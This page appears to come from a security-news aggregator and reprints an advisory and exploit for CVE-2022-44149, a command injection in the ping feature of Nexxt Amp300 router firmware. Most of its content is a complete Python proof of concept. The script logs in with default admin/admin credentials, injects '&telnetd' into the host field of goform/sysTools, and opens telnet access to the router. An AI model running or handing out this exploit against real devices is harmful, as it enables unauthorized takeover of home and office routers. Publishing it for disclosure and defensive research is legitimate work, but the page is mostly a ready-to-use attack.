Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44149: Nexxt Router Firmware 42.103.1.5095 Remote Code Execution ≈ Packet Storm

The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required.

CVE
Open in Source
#web#js#rce#auth#telnet
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)# Date: 19/10/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://www.nexxtsolutions.com/# Version: 42.103.1.5095# Tested on: ARN02304U8# CVE : CVE-2022-44149import requestsimport base64router_host = "http://192.168.1.1"username = "admin"password = "admin"def main():    send_payload("&telnetd")    print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")    passdef gen_header(u, p):    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")def send_payload(payload):    url = router_host+"/goform/sysTools"    headers = {"Authorization": "Basic {}".format(gen_header(username, password))}    params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}    requests.post(url, headers=headers, data=params)if __name__ == '__main__':    main()

Related news

Nexxt Router Firmware 42.103.1.5095 Remote Code Execution

Nexxt Router Firmware version 42.103.1.5095 authenticated remote code execution exploit that enables telnetd.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE